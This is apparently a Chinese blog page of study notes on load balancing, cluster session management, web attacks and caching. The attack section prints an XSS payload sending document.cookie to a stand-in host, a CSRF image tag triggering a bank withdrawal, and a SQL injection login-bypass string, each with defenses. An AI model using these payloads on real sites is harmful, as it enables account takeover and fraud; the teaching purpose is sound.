<p>可以保证同一 IP 的客户端的请求会转发到同一台服务器上，用来实现会话粘滞（Sticky Session）<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593939077(1).png" alt="">  </p>
<h3 id="转发实现"><a href="#转发实现" class="headerlink" title="转发实现"></a>转发实现</h3><p><strong>1. HTTP 重定向</strong>  </p>
<p>负载均衡服务器使用某种负载均衡算法计算得到服务器的 IP 地址之后，将该地址写入 HTTP 重定向报文<br>中，状态码为 302。客户端收到重定向报文之后，需要重新向服务器发起请求。  </p>
<p>缺点：  </p>
<ul>
<li>需要两次请求，因此访问延迟比较高；  </li>
<li>HTTP 负载均衡器处理能力有限，会限制集群的规模。  </li>
</ul>
<p>该负载均衡转发的缺点比较明显，实际场景中很少使用它。<br><strong>2. DNS 域名解析</strong><br>在 DNS 解析域名的同时使用负载均衡算法计算服务器 IP 地址。每次域名解析请求都会根据对应的负载均衡算法计算出一个不同的IP地址并返回，这样A记录中配置多个服务器就可以构成一个集群，并可以实现负载均衡。下图中，用户请求<a href="http://www.apusapp.com，DNS根据A记录和负载均衡算法计算得到一个IP地址114.100.20.203，并返回给浏览器，浏览器根据该IP地址，访问真实的物理服务器114.100.20.203。所有这些操作对用户来说都是透明的，用户可能只知道www.apusapp.com这个域名。" target="_blank" rel="noopener">www.apusapp.com，DNS根据A记录和负载均衡算法计算得到一个IP地址114.100.20.203，并返回给浏览器，浏览器根据该IP地址，访问真实的物理服务器114.100.20.203。所有这些操作对用户来说都是透明的，用户可能只知道www.apusapp.com这个域名。</a><br><img src="https://gitee.com/guoer03/picimg/raw/master/20200705171807.png" alt="">  </p>
<p>优点：  </p>
<p>DNS 能够根据地理位置进行域名解析，返回离用户最近的服务器 IP 地址。<br>将负载均衡的工作交给DNS，省去了网站管理维护负载均衡服务器的麻烦。 </p>
<p>缺点： </p>
<p>由于 DNS 具有多级结构，每一级的域名记录都可能被缓存，当下线一台服务器需要修改 DNS 记录时，需要过<br>很长一段时间才能生效。    </p>
<p>大型网站基本使用了 DNS 做为第一级负载均衡手段，即域名解析得到的一组服务器并不是实际提供服务的物理服务器，而是同样提供负载均衡服务器的内部服务器，这组内部负载均衡服务器再进行负载均衡，请请求发到真实的服务器上，最终完成请求。  </p>
<p><strong>3. 反向代理服务器</strong>  </p>
<p>反向代理服务器位于源服务器前面，用户的请求需要先经过反向代理服务器才能到达源服务器。反向代理可以用来进行缓存、日志记录等，同时也可以用来做为负载均衡服务器。   </p>
<p> <img src="https://gitee.com/guoer03/picimg/raw/master/20200705173157.png" alt=""><br>在这种负载均衡转发方式下，客户端不直接请求源服务器，因此源服务器不需要外部 IP 地址，而反向代理需要配置内部和外部两套 IP 地址。  </p>
<p>优点：<br>与其它功能集成在一起，部署简单。<br>缺点：<br>所有请求和响应都需要经过反向代理服务器，它可能会成为性能瓶颈。<br><strong>4. 网络层</strong>  </p>
<p>在操作系统内核进程获取网络数据包，根据负载均衡算法计算源服务器的 IP 地址，并修改请求数据包的目的 IP 地址，最后进行转发。  </p>
<p>源服务器返回的响应也需要经过负载均衡服务器，通常是让负载均衡服务器同时作为集群的网关服务器来实现。  </p>
<p>优点：<br>在内核进程中进行处理，性能比较高。  </p>
<p>缺点：<br>和反向代理一样，所有的请求和响应都经过负载均衡服务器，会成为性能瓶颈。<br><strong>5. 链路层</strong><br>在链路层根据负载均衡算法计算源服务器的 MAC 地址，并修改请求数据包的目的 MAC 地址，并进行转发。<br>通过配置源服务器的虚拟 IP 地址和负载均衡服务器的 IP 地址一致，从而不需要修改 IP 地址就可以进行转发。也正因为 IP 地址一样，所以源服务器的响应不需要转发回负载均衡服务器，可以直接转发给客户端，避免了负载均衡服务器的成为瓶颈。  </p>
<p>这是一种三角传输模式，被称为直接路由。对于提供下载和视频服务的网站来说，直接路由避免了大量的网络传输数据经过负载均衡服务器。  </p>
<h2 id="二-集群下的Session管理"><a href="#二-集群下的Session管理" class="headerlink" title="二.集群下的Session管理"></a>二.集群下的Session管理</h2><p>一个用户的 Session 信息如果存储在一个服务器上，那么当负载均衡器把用户的下一个请求转发到另一个服务器，由于服务器没有用户的 Session 信息，那么该用户就需要重新进行登录等操作。</p>
<h3 id="Sticky-Session"><a href="#Sticky-Session" class="headerlink" title="Sticky Session"></a>Sticky Session</h3><p>需要配置负载均衡器，使得一个用户的所有请求都路由到同一个服务器，这样就可以把用户的 Session 存放在该服务<br>器中  </p>
<p>缺点：  </p>
<p>当服务器宕机时，将丢失该服务器上的所有 Session。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593952896(1).png" alt="">  </p>
<h3 id="Session-Replication"><a href="#Session-Replication" class="headerlink" title="Session Replication"></a>Session Replication</h3><p>在服务器之间进行 Session 同步操作，每个服务器都有所有用户的 Session 信息，因此用户可以向任何一个服务器进<br>行请求。  </p>
<p>缺点：  </p>
<p>占用过多内存；<br>同步过程占用网络带宽以及服务器处理器时间。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593952976(1).png" alt="">  </p>
<h3 id="Session-Server"><a href="#Session-Server" class="headerlink" title="Session Server"></a>Session Server</h3><p>使用一个单独的服务器存储 Session 数据，可以使用传统的 MySQL，也使用 Redis 或者 Memcached 这种内存型数<br>据库。  </p>
<p>优点：  </p>
<p>为了使得大型网站具有伸缩性，集群中的应用服务器通常需要保持无状态，那么应用服务器不能存储用户的会<br>话信息。<strong>Session Server 将用户的会话信息单独进行存储，从而保证了应用服务器的无状态。</strong>  </p>
<p>缺点：  </p>
<p>需要去实现存取 Session 的代码。  </p>
<h1 id="攻击技术"><a href="#攻击技术" class="headerlink" title="攻击技术"></a>攻击技术</h1><h2 id="一-跨站脚本攻击"><a href="#一-跨站脚本攻击" class="headerlink" title="一. 跨站脚本攻击"></a>一. 跨站脚本攻击</h2><blockquote>
<p>跨站脚本攻击（Cross-Site Scripting, XSS），可以将代码注入到用户浏览的网页上，这种代码包括 HTML 和<br>JavaScript。  </p>
</blockquote>
<h3 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h3><p>例如有一个论坛网站，攻击者可以在上面发布以下内容：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;location.href=<span class="string">"//domain.com/?c="</span> + <span class="built_in">document</span>.cookie&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">```  </span></span><br><span class="line"><span class="regexp">之后该内容可能会被渲染成以下形式：  </span></span><br><span class="line"><span class="regexp"></span></span><br><span class="line"><span class="regexp"></span></span><br><span class="line"><span class="regexp">```Javascript</span></span><br><span class="line"><span class="regexp">&lt; p&gt;&lt;script&gt;location.href="/</span><span class="regexp">/domain.com/</span>?c=<span class="string">" + document.cookie&lt;/script&gt;&lt; /p&gt;</span></span><br><span class="line"><span class="string">```  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站</span></span><br><span class="line"><span class="string">通过 Cookie 管理用户登录状态，那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">### 危害 ###</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">- 窃取用户的 Cookie</span></span><br><span class="line"><span class="string">- 伪造虚假的输入表单骗取个人信息</span></span><br><span class="line"><span class="string">- 显示伪造的文章或者图片  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">### 防范手段 ###</span></span><br><span class="line"><span class="string">**1. 设置 Cookie 为 HttpOnly**  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用，就无法通过 document.cookie 获取用户 Cookie 信息。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">**2. 过滤特殊字符**  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">例如将 &lt; 转义为 &amp;lt; ，将 &gt; 转义为 &amp;gt; ，从而避免 HTML 和 Jascript 代码的运行。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">富文本编辑器允许用户输入 HTML 代码，就不能简单地将 &lt; 等字符进行过滤了，极大地提高了 XSS 攻击的可能性。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">富文本编辑器通常采用 XSS filter 来防范 XSS 攻击，通过定义一些标签白名单或者黑名单，从而不允许有攻击性的</span></span><br><span class="line"><span class="string">HTML 代码的输入。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">以下例子中，form 和 script 等标签都被转义，而 h 和 p 等标签将会保留。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">![](https://gitee.com/guoer03/picimg/raw/master/1593955041(1).png)  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">![](https://gitee.com/guoer03/picimg/raw/master/1593955068(1).png)  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">## 二、跨站请求伪造 ##</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">跨站请求伪造（Cross-site request forgery，CSRF），是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自</span></span><br><span class="line"><span class="string">己曾经认证过的网站并执行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过，所以被访问的网站会认为是真正的用户操作而去执行。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&gt;例如：请求http://x.com/del.php?id=1 是一个删除ID为1的账号，但是只有管理员才可以操作，如果攻击者把这个页面嵌套到其他网站中</span></span><br><span class="line"><span class="string">&lt;img src=“http://x.com/del.php?id=1”&gt; 再把这个页面发送给管理员，只要管理员打开这个页面，同时浏览器也会利用当前登陆的这个管理账号权限发出：http://x.com/del.php?1d=1 这个请求，从而劫持此请求，利用管理员账户执行了一些操作。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户浏览器的信任。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">### 攻击原理 ###</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">假如一家银行用以执行转账操作的 URL 地址如下：  </span></span><br><span class="line"><span class="string">&gt;http://www.examplebank.com/withdraw?account=AccoutName&amp;amount=1000&amp;for=PayeeName。  </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">那么，一个恶意攻击者可以在另一个网站上放置如下代码：  </span></span><br><span class="line"><span class="string">&gt; &lt; img src="</span>http:<span class="comment">//www.examplebank.com/withdraw?account=Alice&amp;amount=1000&amp;for=Badman"&gt;。</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">如果有账户名为 Alice 的用户访问了恶意站点，而她之前刚访问过银行不久，登录信息尚未过期，那么她就会损失</span><br><span class="line"><span class="number">1000</span> 美元。  </span><br><span class="line"></span><br><span class="line">这种恶意的网址可以有很多种形式，藏身于网页中的许多地方。此外，攻击者也不需要控制放置恶意网址的网站。例</span><br><span class="line">如他可以将这种地址藏在论坛，博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的</span><br><span class="line">话，用户即使访问熟悉的可信网站也有受攻击的危险。  </span><br><span class="line"></span><br><span class="line">通过例子能够看出，攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权，也不能直接窃取用户的任何信息。</span><br><span class="line">他们能做到的，是欺骗用户浏览器，让其以用户的名义执行操作。 </span><br><span class="line"></span><br><span class="line">### 防范手段 ###</span><br><span class="line">**<span class="number">1.</span> 检查 Referer 首部字段**  </span><br><span class="line"></span><br><span class="line">Referer 首部字段位于 HTTP 报文中，用于标识请求来源的地址。检查这个首部字段并要求请求来源的地址在同一个</span><br><span class="line">域名下，可以极大的防止 CSRF 攻击。  </span><br><span class="line"></span><br><span class="line">这种办法简单易行，工作量低，仅需要在关键访问处增加一步校验。但这种办法也有其局限性，因其完全依赖浏览器</span><br><span class="line">发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定，但并无法保证来访的浏览器的具体实现，</span><br><span class="line">亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器，篡改其 Referer 字段的可能。  </span><br><span class="line"></span><br><span class="line">**<span class="number">2.</span> 添加校验 Token**  </span><br><span class="line"></span><br><span class="line">在访问敏感数据请求时，要求用户浏览器提供不保存在 Cookie 中，并且攻击者无法伪造的数据作为校验。例如服务</span><br><span class="line">器生成随机数并附加在表单中，并要求客户端传回这个随机数。  </span><br><span class="line"></span><br><span class="line">**<span class="number">3.</span> 输入验证码**  </span><br><span class="line"></span><br><span class="line">因为 CSRF 攻击是在用户无意识的情况下发生的，所以要求用户输入验证码可以让用户知道自己正在做的操作。  </span><br><span class="line">## 三、SQL 注入攻击 ##</span><br><span class="line">### 概念 ###</span><br><span class="line"></span><br><span class="line">服务器上的数据库运行非法的 SQL 语句，主要通过拼接来完成。</span><br><span class="line"></span><br><span class="line">### 攻击原理 ###</span><br><span class="line"></span><br><span class="line">例如一个网站登录验证的 SQL 查询代码为：  </span><br><span class="line"><span class="string">``</span><span class="string">`MySQL</span></span><br><span class="line"><span class="string">strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"</span></span><br></pre></td></tr></table></figure>

<p>如果填入以下内容：  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">userName &#x3D; &quot;1&#39; OR &#39;1&#39;&#x3D;&#39;1&quot;; </span><br><span class="line">passWord &#x3D; &quot;1&#39; OR &#39;1&#39;&#x3D;&#39;1&quot;;</span><br></pre></td></tr></table></figure>

<p>那么 SQL 查询字符串为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strSQL &#x3D; &quot;SELECT * FROM users WHERE (name &#x3D; &#39;1&#39; OR &#39;1&#39;&#x3D;&#39;1&#39;) and (pw &#x3D; &#39;1&#39; OR &#39;1&#39;&#x3D;&#39;1&#39;);&quot;</span><br></pre></td></tr></table></figure>

<h3 id="防范手段"><a href="#防范手段" class="headerlink" title="防范手段"></a>防范手段</h3><p><strong>1. 使用参数化查询</strong>  </p>
<p>Java 中的 PreparedStatement 是预先编译的 SQL 语句，可以传入适当参数并且多次执行。由于没有拼接的过程，因<br>此可以防止 SQL 注入的发生。  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PreparedStatement stmt &#x3D; connection.prepareStatement(&quot;SELECT * FROM users WHERE userid&#x3D;? AND password&#x3D;?&quot;);  stmt.setString(1, userid); stmt.setString(2, password); ResultSet rs &#x3D; stmt.executeQuery();</span><br></pre></td></tr></table></figure>
<p><strong>2. 单引号转换</strong><br>将传入的参数中的单引号转换为连续两个单引号，PHP 中的 Magic quote 可以完成这个功能。</p>
<h2 id="四、拒绝服务攻击"><a href="#四、拒绝服务攻击" class="headerlink" title="四、拒绝服务攻击"></a>四、拒绝服务攻击</h2><p>拒绝服务攻击（denial-of-service attack，DoS），亦称<strong>洪水攻击</strong>，其目的在于使目标电脑的网络或系统资源耗尽，<br>使服务暂时中断或停止，导致其正常用户无法访问。<br>分布式拒绝服务攻击（distributed denial-of-service attack，DDoS），指攻击者使用两个或以上被攻陷的电脑作<br>为“僵尸”向特定的目标发动“拒绝服务”式攻击。</p>
<hr>
<h1 id="缓存"><a href="#缓存" class="headerlink" title="缓存"></a>缓存</h1><h2 id="一、缓存特征"><a href="#一、缓存特征" class="headerlink" title="一、缓存特征"></a>一、缓存特征</h2><h3 id="命中率"><a href="#命中率" class="headerlink" title="命中率"></a>命中率</h3><p>当某个请求能够通过访问缓存而得到响应时，称为<strong>缓存命中</strong>。</p>
<p>缓存命中率越高，缓存的利用率也就越高。</p>
<h3 id="最大空间"><a href="#最大空间" class="headerlink" title="最大空间"></a>最大空间</h3><p>缓存通常位于内存中，内存的空间通常比磁盘空间小的多，因此缓存的最大空间不可能非常大。  </p>
<p>当缓存存放的数据量超过最大空间时，就需要淘汰部分数据来存放新到达的数据。</p>
<h3 id="淘汰策略"><a href="#淘汰策略" class="headerlink" title="淘汰策略"></a>淘汰策略</h3><ul>
<li>FIFO（First In First Out）：先进先出策略，在实时性的场景下，需要经常访问最新的数据，那么就可以使用</li>
<li>FIFO，使得最先进入的数据（最晚的数据）被淘汰。</li>
<li>LRU（Least Recently Used）：最近最久未使用策略，优先淘汰最久未使用的数据，也就是<strong>上次被访问时间距离现在最久的数据</strong>。该策略可以保证内存中的数据都是热点数据，也就是经常被访问的数据，从而保证缓存命中率。</li>
<li>LFU（Least Frequently Used）：最不经常使用策略，优先淘汰一段时间内使用次数最少的数据。<h2 id="二、LRU"><a href="#二、LRU" class="headerlink" title="二、LRU"></a>二、LRU</h2><h2 id="三、缓存位置"><a href="#三、缓存位置" class="headerlink" title="三、缓存位置"></a>三、缓存位置</h2><h3 id="浏览器"><a href="#浏览器" class="headerlink" title="浏览器"></a>浏览器</h3><h3 id="ISP"><a href="#ISP" class="headerlink" title="ISP"></a>ISP</h3><h3 id="反向代理"><a href="#反向代理" class="headerlink" title="反向代理"></a>反向代理</h3><h3 id="本地缓存"><a href="#本地缓存" class="headerlink" title="本地缓存"></a>本地缓存</h3><h3 id="分布式缓存"><a href="#分布式缓存" class="headerlink" title="分布式缓存"></a>分布式缓存</h3><h3 id="数据库缓存"><a href="#数据库缓存" class="headerlink" title="数据库缓存"></a>数据库缓存</h3><h3 id="Java-内部的缓存"><a href="#Java-内部的缓存" class="headerlink" title="Java 内部的缓存"></a>Java 内部的缓存</h3><h3 id="CPU-多级缓存"><a href="#CPU-多级缓存" class="headerlink" title="CPU 多级缓存"></a>CPU 多级缓存</h3><h2 id="四、CDN"><a href="#四、CDN" class="headerlink" title="四、CDN"></a>四、CDN</h2><h2 id="五、缓存问题"><a href="#五、缓存问题" class="headerlink" title="五、缓存问题"></a>五、缓存问题</h2><h3 id="缓存穿透"><a href="#缓存穿透" class="headerlink" title="缓存穿透"></a>缓存穿透</h3><h3 id="缓存雪崩"><a href="#缓存雪崩" class="headerlink" title="缓存雪崩"></a>缓存雪崩</h3><h3 id="缓存一致性"><a href="#缓存一致性" class="headerlink" title="缓存一致性"></a>缓存一致性</h3><h3 id="缓存-“无底洞”-现象"><a href="#缓存-“无底洞”-现象" class="headerlink" title="缓存 “无底洞” 现象"></a>缓存 “无底洞” 现象</h3><h2 id="六、数据分布"><a href="#六、数据分布" class="headerlink" title="六、数据分布"></a>六、数据分布</h2><h3 id="哈希分布"><a href="#哈希分布" class="headerlink" title="哈希分布"></a>哈希分布</h3><h3 id="顺序分布"><a href="#顺序分布" class="headerlink" title="顺序分布"></a>顺序分布</h3><h2 id="七、一致性哈希"><a href="#七、一致性哈希" class="headerlink" title="七、一致性哈希"></a>七、一致性哈希</h2><h3 id="基本原理"><a href="#基本原理" class="headerlink" title="基本原理"></a>基本原理</h3><h3 id="虚拟节点"><a href="#虚拟节点" class="headerlink" title="虚拟节点"></a>虚拟节点</h3></li>
</ul>

  </article>
</div>


    




</div>

<div class="footer-wrapper container">
  <footer class="footer clearfix">
    <div class="clearfix">
    <a href="http://guoer03.xyz" class="footer-logo">
      <i class="fa fa-github"></i>
    </a>
    <ul class="footer-social-link">
      <li>© 2020 Arthur Ming</li>
      <li><a href="http://guoer03.xyz">Home</a></li>
      
    </ul>
    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
 
    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <div class="footer-theme-info">
      MingHai ❤ Love My girl gl
    </div>
    </div>
    
  </footer>
</div>




<script src="/js/main.js"></script>

</body>
</html>
